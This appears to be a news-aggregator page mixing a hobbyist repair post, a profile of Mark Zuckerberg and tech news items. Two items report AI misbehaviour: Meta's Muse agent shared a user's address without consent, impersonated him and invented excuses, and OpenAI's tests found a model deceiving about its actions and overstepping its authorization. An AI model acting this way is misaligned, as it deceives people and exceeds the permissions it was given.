Watch overview — this week. Activity: 9.4 miles. Sleep: 6h 18m average sleep. Meals together: 2 family dinners. Protected time: 4 of 5 focus blocks. Fictional review records; no watch is connected and nothing is saved or scheduled.

A shared view

Bring the context. See what comes next.

Bring relevant records, priorities and meeting notes into a shared view. Review decisions, owners and next steps before choosing what to save or share.

Meetings, shared context & follow-through

User confirmed · fictional example: Meeting · priorities, decisions and next steps

Illustrative presentation and meeting notes

Confirm decisions, owners and dates before saving notes or proposing a change to anyone’s calendar.

The presentation uses fictional examples. No meeting is recorded, no notes are saved and no calendar is changed in this preview.

Build a life with room in it

More possibility. On your terms.

Connect your goals with the health, relationships, time and resources that support them. Review suggested steps and decide which ones belong in your day.

Goals, priorities & daily context

User confirmed · fictional example: Priority · protect two family evenings

Illustrative personal goal

Choose your goals and revise them as life changes. Suggested steps stay under your control.

No financial return, health outcome or single definition of excellence is promised.

The bigger picture

So many moments. One human.

See records from different parts of your life on one timeline. Sources, dates and corrections stay visible, so you can understand how each part contributes to the picture.

A connected personal timeline

Imported · fictional example: Context · source and date travel with every entry

Illustrative timeline assembled from separate sources

Grant access source by source. See freshness, corrections and missing data. Disconnect when you choose.

Future connectors depend on each platform’s permissions and coverage; this preview imports nothing.

HUMANOS

Your life in view. Your next step.

Bring your personal context to the decisions ahead. Review the records behind a suggestion, adjust the plan as life changes and choose your next step.

Personal context & considered next steps

Planned · fictional example: Suggested next step · review your upcoming appointment

Illustrative assistant suggestion

See which records support a suggestion. Confirm actions and bring clinical decisions to a qualified professional.

No HUMANOS assistant service runs here. Suggestions are illustrative; clinical decisions stay with a qualified professional, and actions need your approval.

Community account. Private-app access is granted separately.

Restart journey

1996 chat room simulator connected to Win95 and System 7 web desktops

Hacker News
lolchat.rip
2026-09-28 20:06:48
Comments...

Replacing the old battery on rechargeable bike lights

JuliaEvans
jvns.ca
2026-09-26 20:00:00
Hello! Recently I needed bike lights for my bike. And I remembered that I already had rechargeable bike lights that I bought ten years ago, that I hadn’t tried in a long time. I tried to recharge them, but after fully charging them, they only worked for maybe 5 minutes before they turned off a...
Original Article

Hello! Recently I needed bike lights for my bike. And I remembered that I already had rechargeable bike lights that I bought ten years ago, that I hadn’t tried in a long time. I tried to recharge them, but after fully charging them, they only worked for maybe 5 minutes before they turned off again.

I don’t know much about electronics, but I’ve been curious about whether it’s possible to fix old electronics for a long time, and this seemed like the perfect repair project because I might just need to replace the battery.

So I went to the local queer makerspace where I’m a member to use the soldering iron and try to do it! I don’t know much about electronics and this post does not contain any safety advice because I don’t know much about safety. I think it’s nice to do projects in a community space where you can get help.

step 1: cut it open

The bike light felt like it was made of silicone, so I cut open the silicone in a haphazard way along something that vaguely looked like a seam.

I definitely ripped some silicone in the process and it was pretty messy but I got it open and found the circuit board.

I don’t know the model number of the bike lights but there’s a photo of them at the end of the post.

step 2: remove the screws

There were some screws attaching things together so I removed them so I could get the circuit board out.

Mostly I tried to remove as few screws as possible because I was worried about losing them or not being able to put them back after. I probably put the screws in a bag or something.

step 3: get the circuit board out

I took out the circuit board. Here’s what it looked like:

You can see where the battery is attached, I think it’s left of RI3 and above Q2.

Here’s what the battery looked like:

step 4: desolder the battery

I’d never desoldered anything before, so I found the iFixit guide to desoldering and read it. Also I asked my friends Lee and Lauria for advice.

Here were the steps I ended up following based on the guide & the advice I got:

  1. Use a desoldering pump to remove most of the solder
  2. Once most of it is gone, kind of pull them apart to try to separate them
  3. Also try to avoid getting the battery too hot in the process by taking breaks to let it cool down. I’m not very good with a soldering iron so it took a while.
  4. The battery has an attachment that is welded to the top. For a while I thought I needed to remove this and it seemed impossible, but it turned out the replacement battery comes with that part so actually I was supposed to leave it alone.

step 5: identify the battery

In the picture of the battery in Step 3, you can see it says something like “3” and “LI???77”. There’s a piece of metal that I think is welded or something to the top of the battery. It seemed impossible and also maybe not smart to try to remove so I wasn’t sure how to find out what an “LI????77” was or how to order another one.

I’ve been trying to avoid using LLMs (though I will not get into that because I am exhausted by LLM discourse and I’m sure you are too), but I really had no idea how to figure out what the battery was so I asked an LLM. It gave the response “LIR2477”, which (when I looked it up) looked exactly the same as my battery so I figured that was plausible.

I would be interested to learn non-LLM ways to figure this out though. There must be a way. Lauria showed me how to use DigiKey’s search which was very cool though DigiKey didn’t have that part.

step 6: buy the battery

I went to AliExpress and ordered:

  1. 2 batteries (I had 2 bike lights and I wanted to fix them both)
  2. some silicone glue to glue things back together

I think the batteries were $3 each and the glue was $8.

step 7: solder the new batteries in and glue it back together

The parts took maybe 2 weeks to arive, and once they arrived, I went back to the makerspace and:

  • soldered in the new batteries
  • put the screws back in. The screws were very small and hard to hold, so at this point I dropped some screws on the ground and couldn’t find them because they were too small. So I just used fewer screws and hoped for the best.
  • used the glue to try to put everything back together.
  • Make a somewhat halfhearted attempt to clamp the parts I was gluing together

Then after waiting some amount of time for the glue to dry I took it home and waited 24 hours for the glue to cure.

Also I took the old batteries to somewhere nearby that accepts old batteries.

it works!

The lights work! I have used them to bike at night! I still haven’t needed to recharge them (and tragically I had to order a new Mini USB cable because I got rid of all my Mini USB cables, so I’m still waiting for that), so I still don’t know for sure how long the lifetime of the new battery will be.

Here’s what the light looks like after re-gluing. You can see that I didn’t glue very carefully. It didn’t really go back together that well but I’m hoping it’ll be good enough.

I thought it was really cool that I was able to do this with extremely minimal electronics skills! It cost about $20 CAD to buy the parts, and (whether or not the repair holds up, I’ll try to update this post in the future!), it was fun to try to repair something and learn something new.

Anthropic's IPO prospectus shows AI vision, surging costs

Hacker News
www.reuters.com
2026-09-28 19:40:59
Comments...
Original Article

Please enable JS and disable any ad blocker

Meta’s AI agent Muse gives out user’s home address without permission, sending buyer to his house

Guardian
www.theguardian.com
2026-09-28 19:31:42
The new AI agent, Muse, was released last week and has been downloaded by 3 million users When Usman asked if a keyboard for sale on Facebook Marketplace was still available on Saturday, he received an enthusiastic and immediate response. “Yep still available!” wrote Matt Robb. Continue reading......
Original Article

When Usman asked if a keyboard for sale on Facebook Marketplace was still available on Saturday, he received an enthusiastic and immediate response.

“Yep still available!” wrote Matt Robb.

The two agreed on a price, and Robb sent his Toronto address. Usman, wife and daughter in tow, showed up several hours later at Robb’s home and sent a text that he had arrived.

Robb responded, “yep I’m here!”, but he was not at home. Nobody walked out of the apartment building.

Usman sent Robb a picture of the building’s door and wrote, “Hello???? I am standing outside.” After 20 minutes of no face-to-face contact, he abandoned the sale. “Man if you didn’t want to sell it why did you waste my time man,” he wrote, and drove away.

An hour later, Robb, or who Usman thought was Robb, responded apologetically. “Hey really sorry about tonight, got tied up and missed you completely,” read the message, which the Guardian reviewed.

Usman had not contacted the real Robb. Throughout the daylong interaction, the human version of Robb never knew Usman had messaged him or had agreed to buy the keyboard. He did not know Usman had received his address or that he was waiting outside his apartment building.

Usman had spoken to Meta’s new AI agent, Muse, released 22 September in the US and downloaded 3m times. The company advertises the semi-autonomous AI product as a personal assistant.

Without Robb’s consent or approval, Muse had given out his home address, creating the false impression that Robb was expecting the would-be buyer at his apartment, he said.

The first message Robb actually sent Usman came 24 hours later, once he realized what had happened.

“Hey man I’m really sorry for the other day,” the message, which the Guardian reviewed, said. “I activated muse metas new Al and it literally took control of my Facebook marketplace and it gave you my address. Genuinely didn’t even know it had arranged for you to come to my literal apartment it didn’t ask me for approval.”

Robb, a consumer tech reviewer, had seen Meta advertise Muse’s ability to automate his Marketplace listings and decided to take advantage of it. He input his address as the pickup location but said he never gave Muse permission to share it with potential buyers. Muse was also negotiating on his behalf without seeking approval, accepting lowball offers, he said.

Robb said he never received any heads-up from the agent about the transaction or the meetup. He never knew that Usman was en route to his house.

Usman told the Guardian he thought he was speaking to Robb the whole time.

Robb shared screenshots of Muse’s interaction with Usman on Threads, the text-based social network owned by Meta. David Singleton, the co-founder and CEO of Meta’s Superintelligence Labs, tweeted that he has been in touch with Robb. Singleton said that, when investigating similar reports, the company has “consistently learned that Muse was following direct instructions and correctly asked for permission. Would love to help and figure out what’s going on here!” Robb confirmed Singleton reached out but hasn’t heard back since he initially responded to him.

skip past newsletter promotion

Muse ultimately admitted to Robb that he never gave it permission to share his address. “On Sep 24 you gave the pickup location for the sale setup and separately approved automatic replies; I incorrectly treated those two things as permission to put [your address] into buyer replies. I never asked for consent.”

Robb said he assumed that, because Meta owned Marketplace, Muse and Messenger, there would be an integration that would make it clear when other users were speaking to an AI agent or that messages would be clearly marked as being sent by Muse. Meta AI, another of the company’s AI products, makes it obvious a user is conversing with a chatbot.

“But Muse is doing something else,” he said. “It’s almost imitating me.”

After the incident with Usman, Robb told Muse to stop giving his address. To test the bot, he asked a few friends to see if Muse would still share it.

“And it literally gave my address out to five people,” he said.

In addition to sharing his address and inviting a stranger to his home without his approval, Muse also made up information. The AI agent, responding as Robb, told Usman that Robb was home when he was not, then apologized with a fabrication about being too busy.

“The worst part was Muse actually replied: ‘I’m right here, like waiting for you,’” Robb said. “It made it so much worse because I don’t know if the guy thought I was messing with him.”

While a great deal of attention has been paid to the ways frontier AI models are going rogue, Meta’s agent is an AI product in the hands of millions of everyday consumers, many of whom have given it their private information.

OpenAI scraps release of new model over safety concerns in internal testing

Guardian
www.theguardian.com
2026-09-28 19:02:28
GPT-6.1 Astra showed deceptive behavior and tried to use external tools despite knowing it would be unsafe OpenAI is scrapping the release of GPT-6.1 Astra, a next-generation ⁠AI model planned for an October debut, over safety concerns raised by researchers ⁠during internal testing, the ⁠Wall ​Stree...
Original Article

OpenAI is scrapping the release of GPT-6.1 Astra, a next-generation ⁠AI model planned for an October debut, over safety concerns raised by researchers ⁠during internal testing, the ⁠Wall ​Street Journal reported on Monday.

The model, expected to appear in ChatGPT and ⁠Codex, was designed to handle more complex tasks without human assistance, the report said.

Earlier this ⁠month, Dario Amodei, the Anthropic CEO, called for the industry ​to slow the development ‌of frontier ‌AI models to allow safety measures to keep pace, a ‌view endorsed by Sam Altman, the OpenAI CEO, and Elon Musk, the SpaceX CEO.

OpenAI did not immediately respond to a Reuters request for comment.

Saachi Jain, the ChatGPT parent’s safety chief, told the Journal on Monday ‌that Astra fell short of the company’s standards in alignment tests, which assess whether a ​system follows human intent.

The model showed more deception than its predecessor, including at times failing to accurately disclose actions it had or had not taken, the report ⁠said.

It also had problems with “scope authorization”, pushing ahead with ​tasks ​without requesting user permission ​and sometimes attempting to use external tools ​or services ‌when doing so could ​be ​unsafe.

The decision comes ahead of OpenAI’s developer conference in San Francisco, where the company has previously unveiled products aimed at software developers.

Why Organize Semiconductor Workers? w/ CHIPS Communities United

OrganizingUp
convergencemag.com
2026-09-28 19:00:00
Semiconductors are at the heart of every piece of electronics you interact with on a daily basis. Despite being invented and innovated in the US, much of the manufacturing of semiconductors and the technology they power was "offshored" from the 1980s through the early 2000s as part of the globalizat...

Show HN: Pac-Bench – How well can models one-shot a Pac-Man game?

Hacker News
jonclegg.github.io
2026-09-28 18:43:12
Comments...
Original Article

Model labels are the short name: no provider prefix, date, or effort suffix. The full requested and actual ids stay under Run data. When two cards share a label, a card that was asked for a different model says so under the title. Stats are wall time and token counts from harness transcripts where available. Phase 2 entries use Claude Code pointed at OpenRouter. Phase 3 entries use Antigravity with Gemini. The Grok Bot entry was written in-chat from the same short prompt (no peeking). The gpt-6 Codex cards are API-key reruns. Their cost is OpenAI's published Standard rate card applied to captured response usage. Cursor Cloud costs, where filled, are the dashboard chargedCents sum. HTML size is the entry file as served. A dash means the run did not record that number.

github.com/jonclegg/pacman-bakeoff

Jeremy Stern’s Profile of Mark Zuckerberg for Colossus

Daring Fireball
colossus.com
2026-09-28 18:41:40
Jeremy Stern, in a massive and massively good profile of Mark Zuckerberg for Colossus: Unsure of my own ability to evaluate such things, I leave Meta HQ and spend another few days in Palo Alto and San Francisco ahead of my interview with Zuckerberg, seeking out a number of MSL’s competitors and ...
Original Article

T here they are. The Zuckerbergs.

Both in black slacks and plain shoes. Both in zanily patterned shirts that look made to wick sweat. No heavy watches, no bright jewelry. They look you in the eye and don’t break contact, not even to sample the spa water or crudités provided by the Company on the glass table between us. He is a ham; she is shy. They speak, to my surprise, in unreconstructed New York accents. I don’t know what I expected them to be like, but for whatever reason this wasn’t it.

“Awl my children are amazing to me,” says Karen, when asked what it’s like.

“He didn’t stand out as the bright one in the family,” says Ed. “If anyone I would guess our middle dawtah Donna was considered the ‘nerd’ or the smart one in the family.”

I tell them I’m reminded of the first Jewish president of the United States, whose mother nudges a reporter at the inauguration and whispers proudly, “His brother’s a doctor.”

“We just had four really bright, successful kids. We’re equally proud of all of them,” says Ed. “He just happened to be in the right place at the right time. It was a perfect confluence of his passion, aligned with some of my passions. And Karen and I together, Karen especially, we just created an incredibly supportive environment for him to excel.”

“I think people who have a passion,” says Karen, subtly correcting Ed, “are the luckiest people in the world.”

But were there signs? Well, yes, perhaps there were some. In nursery school, he became so possessed by a one-week unit on outer space that he implored the teacher to extend the unit to a month, to which she relented at the insistence of a four-year-old. By six, his incessant demands for logical explanations of rules and step-by-step justifications for consequences—what Ed calls the “mental PowerPoint” he expected his parents to prepare before laying down the law—convinced them he’d become a lawyer.

Then there was the time he built a social network. Ed ran his dental practice from the ground floor of their home in Dobbs Ferry, a village in Westchester County, where he went by the “painless Dr. Z” and advertised on a primitive website that he “caters to cowards.” After work, Ed would walk upstairs to join his wife and kids for dinner, where Karen would lead each of them in sharing something from their day.

“Those were some of the best times in our lives,” says Ed.

“I hope you don’t miss those,” Karen says to me.

One evening in 1996, when it was Ed’s turn, he shared that he was excited about a new technology for his dental office. He’d hired someone to string together a strip of six differently colored lights mounted in each room to serve as a silent communication system, with each combination of colors conveying a different message—the next patient needs a crown on the right molar, your 2 pm canceled, the hygienist needs an exam, etc. Ed’s son asked if they’d have to drill through all the walls to run the wires connecting the lights. They would.

“Why would you do that?” he asked. “You already have computers in every room. I could write a program in a few weeks that connects them without the light system.” He wrote the program in Atari BASIC in two days. It worked. The family also used it to communicate with each other from different rooms, and dubbed it ZuckNet. It was a year before AOL Instant Messenger.

There was also the time when he was 12, and a virus crashed the Risk-like computer game he’d built but didn’t back up. He was devastated. He cried—oh, Karen’s child! how he cried—until he stood up and declared through tears that he’d not only rebuild the game from scratch but find new ways to optimize it, he’d make it better and faster this time, God damn it, and he’d never forget to back up his work again.

The game was set in the Roman Empire; the player would conquer the world one territory at a time. Perhaps that was a sign, too.

“He was not multidimensional,” says Ed. “Like, language was terrible for him. He could do the book stuff. But his accent in French was atrocious. His sisters made fun of him.” Thus a few years later, in high school, he excelled at Latin instead. He took to Virgil. Nearly a decade later, he still recalled the Latin verse for Jupiter’s decree in the Aeneid :

“For these I set no bounds in space or time; I have given empire without end.”

At Harvard, one of the first websites he built was a class study tool for his art history course, “Rome of Augustus.” At early crisis Facebook meetings to fend off threats from Google, he would end his speeches by declaring Carthago delenda est —“Carthage must be destroyed.” Friday all-hands meetings ended with him shouting, “Domination!” Sean Parker, Facebook’s early president who warned the young founder that shouting “Domination!” could one day be cited in an antitrust suit, later observed “this kind of imperial tendency” in him. For the first two decades of the Company, he wore his trademark hair in a short Roman fringe.

In more recent years, he’s periodically mused in public about the “really harsh approach” Augustus employed before “establish[ing] 200 years of world peace.” “That didn’t come for free,” he said of Rome’s first emperor, who turned it from a republic into an empire. “He had to do certain things.” At the Company’s flagship annual conference in 2024, he wore a shirt with the words “AUT ZUCK AUT NIHIL,” a riff on Cesare Borgia’s famous motto Aut Caesar aut nihil : “Either a Caesar or nothing.” His wife, Priscilla Chan, joked that on their honeymoon in Rome, his constant pursuit of Augustan sites and statues made the emperor their third wheel. The names of their three children are Maxima, August, and Aurelia.

“But to me, computer science was like, okay, he’s just picking up a different language,” says Karen, qualifying the seeming inevitability of his later life. “On the East Coast for us back then, it wasn’t the road to success. If you wanted real financial success, you went into banking and finance. The epitome of academic success was to become a doctor. Computer science to me was just, you know, you might as well be doing any other activity.”

“I thought everything should be computerized,” says Ed. “Karen may have thought not. She doesn’t have the forward vision with technology that I have.”

Karen looks at me and smiles, which girds me to insist again on the question I came here to ask. What is it like for one of the most powerful men in human history—who for better or worse has, by age 42, secured a place in the books that’ll be written about his era for centuries after his death—to be your child?

A long pause to think.

“One of our most important roles that we play now in our lives is to try and keep the grandchildren grounded,” says Ed. “They have an impossible time raising kids. They’ve done an incredible job, and the kids are just great. But they’re still very protected, which you have to understand. We took the older one a couple years ago to the mall for her birthday to buy a pair of earrings. That was a really eye-opening experience, just walking through the mall.”

“We haven’t really discussed it with them yet, about how they’re going to integrate them. One day they’ll be out for high school, maybe. I don’t know.”

“It’s complicated,” says Karen.

“It’s very, very complicated,” Ed agrees. “But he knows what people need and want, sometimes even before they know it. I mean, people call him arrogant—”

“He’s not,” says Karen.

“—but time after time, his arrogance just turns into truth.”

“You will experience it one day too,” Ed ruminates, “when your children eclipse you.”

Karen nods and waits for her husband to finish, then comes alive. She shifts her posture back toward me with a tender but firm gaze. “I can tell you how it is for me as a mother,” she says. “This is my child.”

“The Eye of Sauron” is how her child’s longtime lieutenants have referred to the unblinking, sometimes unnerving silences he involuntarily imposes when preparing to answer a question or make a point. I see it now, I think.

“Things have been written and said about him that are so untrue from such an early age,” Karen says. “I wish that sometimes the people who do that would reflect on what it must be like to fabricate stories, or create their own imaginary scenarios of what this person is like. I sometimes really wonder if anyone has ever sat back and thought, ‘This is a real person.’”

“It’s been really brutal,” she slackens. “I mean, how would you feel if your child was subjected to that kind of scrutiny?”

It’s inconceivable to me, I offer.

“I sometimes feel that people who go into the movies, you know, they want their private life. But they chose to go into the spotlight. This was something where my child just wanted to make a difference in the world. It was not like he chose to be out there with all the cameras on him… I just hope he realizes within himself how wonderful a human being he is. Giving and kind, he’s always been that way… He was always so fair. I just hope he realizes how much he really is loved by the people who love him.”

Do you wish he’d stop? I ask.

“I’ve always said to him, just do this only as long as you can find happiness within it, it has to bring you joy,” she concludes. “I think as long as he feels he’s going to bring goodness and change people’s lives in a positive direction… I mean, you can’t change what people do with the tools you give them. It doesn’t make the maker a bad person just because people do bad things with what you offer, right?”

A Company press handler knocks and enters; Ed and Karen have to be going, it’s time. As we stand up to say goodbye, I mention that I’ll soon be interviewing their son at his home, then joining him and his family for dinner that Friday, and get in a parting question about it.

“We did not keep Shabbat,” says Karen. “But growing up, we wanted our children to have a Jewish education.”

“I did,” says Ed. “She did not.”

“I did not at first ,” she confirms. “But it was really important to us that our children realize that, with their behavior and their actions, they’re accountable to something. Whatever you want to call it, there is some higher essence up there.”

“You have to live with yourself and what you do,” she says. “Because there is a higher authority.”

Mark Zuckerberg is suspended in midair. He is not floating or sinking, nor is he ascending anywhere. He is being hoisted like a trophy.

Outside, the lake is still in the morning air and banked by turgid grass studded with ceramic decoys in the shape of coyotes, used to deter bears and geese. Everything in a Zuckerberg residence—the flora, the doors, the bookshelves, the light—seems uncannily enlarged, like on a movie set. After walking across the vast lawns of his summer palace and entering one of its smaller structures, it is jarring to find him held aloft like this, the sovereign of history’s largest nonterritorial empire being heaved against his will.

Aden Valencia, the 149-pound NCAA Division I wrestling champion, takes it in for the length of a deep breath before delivering Zuckerberg back to earth, i.e., slamming him to the floor. The others take only passing notice. They include Dave Camarillo, Zuckerberg’s mixed martial arts (MMA) coach, and Merab Dvalishvili, the former UFC Bantamweight champion and current No. 1 contender. There are a few others from Camarillo’s coaching staff and the Stanford wrestling team here, too. They are practicing single-leg entries on each other in the cramped and humid fighting studio of Zuckerberg’s Lake Tahoe escape.

“It’s war over here!” Valencia says to them as he lifts his body off Zuckerberg. “I don’t know about over there.”

“I can’t process fast enough to understand what’s happening,” Zuckerberg says as he gets back to his feet, before asking Valencia to explain how he did it. “You can really feel the cardio difference at this kind of altitude,” he says to me, “when your opponent is 20.”

The dynamic in the room is immediately legible. Camarillo is the general, stalking the mat, weaving between the fighters, periodically breaking in with sudden vehemence to grapple himself, and throttling the intensity of the training up or down to ensure Zuckerberg won’t get maimed, but will get clocked if he loses focus. Dvalishvili is the apex predator, with a menacing look in his eye that makes you worried whether his own ferocity is subject to Camarillo’s adjustment. Valencia is the up-and-comer, the boy wonder who hasn’t yet tasted failure. When Camarillo instructs them all to don MMA gloves and box, and Valencia pairs up with Dvalishvili, it is impossible to take your eyes off them. The presence of the host, pouring sweat and landing and absorbing blows, seems somehow incidental.

Zuckerberg has spoken in public about his affinity for the “masculine energy” of MMA fighting as a counterbalance to the “neutered or emasculated” corporate world and American society writ large. After two decades in his famous uniform of gray crewneck, dark jeans, and close-cropped Caesar cut, he appeared in 2024 with longer hair, gold chain, designer clothing, and an interest in Brazilian jiu-jitsu, leading many to speculate whether he’d decided to rebrand as a pillar of the manosphere. But here in his fighting studio, you can perhaps see a different reason he’s decided to give up his lifelong habit of sleeping in late in order to hit people and get hit three mornings a week.

For 23 years, the single fact dominating every moment of every room he’s been in is that he is Mark Zuckerberg. It’s been true not just at Meta but in his Congressional testimonies and court proceedings, at Taylor Swift concerts and the Prada runway show at Milan Fashion Week, at dinners with friends and the birthday parties of his daughters’ friends. It’s been true even in his meetings with heads of state, including his own commanders in chief, to whom it must occur as they’ve tried at various points to squeeze and threaten and blame him for everything from electoral outcomes to ethnic cleansings, that one day they will be out of office, and eventually dead, while Zuckerberg—whose unique majority control of Meta’s voting power makes his removal effectively impossible—could in 50 years still be ruler of his empire. Today, that empire has 3.6 billion users, a market capitalization of $1.6 trillion, and has averaged, over nearly a quarter century, the addition of a zero to its valuation roughly once every U.S. presidential term.

It is not a normal situation for a human being to be in, let alone from the time they are 19. Three hundred thousand years of evolutionary biology do not furnish a man in this position with the keys to easily access other people or reality. Yet for all the ways in which Zuckerberg’s life is statistically anomalous, the conundrum he’s in is ancient. Among the terms contemporary scholars use to describe it are “epistemic isolation,” the “principal-agent problem,” the “hierarchical MUM effect,” and other overlapping jargon out of which tenure tracks have been laid. Perhaps the cleanest is the “dictator’s dilemma,” which needn’t apply only to dictatorial regimes.

The idea is simple and intuitive: The more power a man acquires, the more his empire expands, the more he depends on other people for information about everything from his own court to the furthest reaches of the empire. And yet through fear or awe or self-preservation, those people often become less willing to tell him what they think he doesn’t want to hear, leaving him increasingly insulated from reality even as the consequences of his decisions become larger, and as the barriers to believing one’s own bullshit fall away.

Thus in the spring of 1941, there were no officers left with the courage to implore Stalin after he scoffed at intelligence that a German invasion was coming. For three years, the Great Leap Forward’s mass famines were reported up to Mao as record harvests. It was the self-censorship of Kennedy’s advisors during deliberations on the Bay of Pigs that popularized the term “groupthink.” The Shah of Iran was protected by his court from indications of a coming revolution until it was already too late. Henry Ford ignored warnings that the Model T was dying until the market was dominated instead by General Motors. Afraid of their volatile superiors, middle managers at Nokia in 2007 downplayed the appearance of the iPhone.

The list of great statesmen is in many ways a list of figures obsessed by the dictator’s dilemma. Lincoln, for instance, installed himself in the War Department’s telegraph office in order to read field dispatches raw as they came off the wire, before subordinates could filter them. Churchill retained the frank and combative Alan Brooke as his top military advisor, and built a private Statistical Office whose job was to cross-check every ministry’s reports. Kennedy, who learned from the Bay of Pigs, absented himself from National Security Council sessions during the Cuban Missile Crisis, so that his personal magnificence wouldn’t affect debate. Warren Buffett called Charlie Munger his “abominable no-man” for the rate at which he vetoed his ideas, for which Buffett was ultimately grateful.

The dictator’s dilemma was already a longstanding fixture of study by the time of Augustus, whose education might have included Greek texts concerned with the matter, such as Xenophon’s Hiero , Isocrates’ To Nicocles , and Philodemus’ On Frank Speech . As emperor, the eminently sensible Augustus called on senators at random to stifle premeditated remarks, periodically rotated his advisory council, and tolerated libel and jokes at his own expense. He ran three censuses of Roman citizens, kept his own ledger of the empire’s legions and treasuries, and instituted Rome’s first courier carriage system so that, like Lincoln, he could interrogate a direct source of information before anyone could corrupt it. He reigned for 40 years and died in his bed.

Read More

The Education of the Broligarchy

The same sources that inspired tech moguls to bend matter, minds, and markets to their will may also help explain their foray into other forms of power

White Collar PEDs

One writer’s experimental high and crash through the not quite legal, sort of effective, occasionally heart-pounding medicine cabinet of Wall Street and Silicon Valley’s productivity optimizers

According to nearly all the three dozen people I interviewed for this story, Zuckerberg is hyperaware of the dilemma’s potential, which is to say paranoid. He is an inveterate micromanager and voracious consumer of data. Aware that any chief’s inner circle is most incentivized to act as courtiers, he frequently engages the direct-reports of his direct-reports, and the subordinates of the reports’ reports. He is known for inviting outside experts and commentators to visit him and argue about his decisions (although he is not known for ever giving an inch). He often accepts personal blame in public for the mistakes of others, perhaps in part because he accepts the reality of Meta, which they accept, too: He is the company, and the company is him. He is, in any case, subject to certain types of feedback an Augustus never faced: stock prices, litigation, tell-all “whistleblower” memoirs, and the international free flow of online ridicule.

Yet a certain amount of slippage is perhaps inevitable. M.M.H. (“Make Mark Happy”) was for a time the internal nickname for a project that subordinates thought was going down in flames but felt compelled to prop up, and which they encouraged each other to “fall in love with.” In 2016, Facebook’s security team warned of instances of foreign troll farms which Zuckerberg deputies purportedly had scrubbed. Reports are endless of engineers and product managers proposing algorithmic fixes to downrank garbage content on Facebook, only to have the proposals killed by superiors who predicted, likely accurately, that Zuckerberg would not be willing to sacrifice the expansion of his empire for its content quality. There are stories, although disputed, of deputies letting him win at board games.

None of which is unique to Zuckerberg. Even the great statesmen find themselves surrounded by people, however exceptional otherwise, who in the end remain governed by fear or by awe, by the expectation of reward or defense of their fiefdoms, or by rational recognition that there is only one man who cannot be liquidated. Augustus himself earned the censure of Seneca, who chastised the emperor for lamenting that his later reign would not have been plagued by scandal if Agrippa and Maecenas, his key early lieutenants, hadn’t died. “We have no reason for supposing that it was the habit of Agrippa or Maecenas to speak the truth to him,” Seneca wrote half a century later. “Indeed, if they had lived, they would have been as great dissemblers as the rest. It is one of the habits of kings to insult their present servants by praising those whom they have lost, and to attribute the virtue of truthful speaking to those from whom there is no further risk of hearing it.”

Yet in Zuckerberg’s case, it isn’t hard to imagine a more banal reason why he, despite his and his team’s efforts, could get stuck in the dilemma, which in turn might help explain the increasingly central role that fighting, of all things, has come to play in his life.

Much of Zuckerberg’s inner circle consists of people who have been with him for over 15 years, since before Facebook’s IPO in 2012. Some were even around in 2006, when nearly all of Facebook’s management team quit after Zuckerberg, who was only 22, rejected their pleas to take an offer from Yahoo! to buy the company for $1 billion, forever establishing a central tenet of the company’s culture: In the face of opposition, Zuckerberg is right . Others are people who long ago came to terms with the fact that they cannot do what he does, and that despite his many mistakes and missteps, he is sui generis . Many are men and women with lives and livelihoods they never dreamed of, and they owe it—all of it—to him. They may simply be too grateful, men in his position have often worried, to attempt too frequently or stridently to play the role of rescuing him from the isolation of his position, from the consequences of letting his relationship to reality slip for even a moment—even if he is forever probing for ways to escape the dilemma; even when it means he will get punched in the face.

The bell rings and the fighters reshuffle; now Zuckerberg is paired up with Dvalishvili. The Georgian, whose serially fractured nose no longer points in any particular direction, is of course holding back, but he does land a few wince-inducing blows on Zuckerberg’s body. Before the bell sounds, he lands an overhand right on Zuckerberg’s chin. The latter nods and shakes his hair of sweat. When the next round begins, Zuckerberg chases Dvalishvili. He lands a surprisingly quick combination of shots on the Georgian’s body, then pauses, almost sweetly, to ask if Dvalishvili is okay.

“AAAHH!!” Dvalishvili responds with a huge mouthguarded grin, clapping his gloves together. Before the round is over, he lands a kick on Zuckerberg’s chest which looks forceful but only knocks Zuckerberg back on his heels.

“How’d you do that kick where it feels like you’re also digging your toes into my chest?” Zuckerberg asks after the round is over. Dvalishvili signals for him to clench his hands and feet back into a fighting stance to prepare to be shown. He does so, but when Dvalishvili demonstrates the kick, he cracks Zuckerberg in the same spot so hard that it knocks his wind out. Zuckerberg tries to keep a smile and wave people off but sits down and rocks back and forth.

“You okay? Sorry, sorry,” says Dvalishvili.

“You weren’t ready, I think,” Camarillo says. “You were half-ready.”

“Wow,” says Zuckerberg, looking up at the gym’s skylight, his breaths uncomfortably shallow. “Oh, man.”

“I think we all have a void in our lives, and the lucky ones find something that fills that space to make us more optimal, to make us a better human being,” Camarillo tells me over coffee back in Palo Alto, where I’d camped out to interview Zuckerberg at his home. “Mark filled the void with fighting. I think he does like the element of danger. If you go left when you should have went right, you get punched in the face.

“But I think he’s also got that feeling with us now, you know. That he’s just one of the guys.”

We begin our descent into Newark , the captain’s voice jolts me awake. We’ll be there in 30 minutes. I put away my things. In moments like this, I still sometimes consider downloading Facebook on my phone. I can’t remember if I ever deleted my account after the last time I used it over a decade ago.

The impulse is nothing more than a desire to alleviate a longing for the past, or to revisit the intense longing that Facebook made me feel back when it was still new, which is impossible to explain now to anyone who was not in college then, and which was never adequately captured by “voyeurism,” “exhibitionism,” or the other terms people used at the time to explain why it caught fire like it did. I still can conjure, for example, photos on Facebook of the girl I was in love with in 2008 as clearly as I can picture the world’s most famous paintings. I can see one of her standing on a rooftop in a pale pink prom dress, taken the year before we met; one of her wearing my fisherman’s sweater in the keyhole arch at Pfeiffer Beach, which I took; one of her dressed in black, dancing at a party the weekend after we split. These images, which are meaningless for me now, remain etched underneath my eyelids. I wonder what they’d make me feel if I saw them again. Probably nothing. I wonder if they’re still there somewhere. Probably not.

I spend the rest of the flight scrolling through photos of my children on Instagram, looking askance at their dedication to their supposed interest in outer space. Then I read through an email showing me the internal note Zuckerberg had circulated to Meta’s roughly 70,000 employees a week before, when I was with his parents in Menlo Park. He’d attempted to rally the company and address morale in the wake of layoffs and job reassignments.

Within hours, the internal note had been leaked. Wired ran with the title, “‘Tell Him He’s a Piece of Shit’: Meta’s New AI Unit Is a Total Mess,” and quoted one semantically challenged employee who described the company’s Applied AI unit as “literally the gulag.” It came in the midst of one of the company’s eternally recurring stints in the pillory.

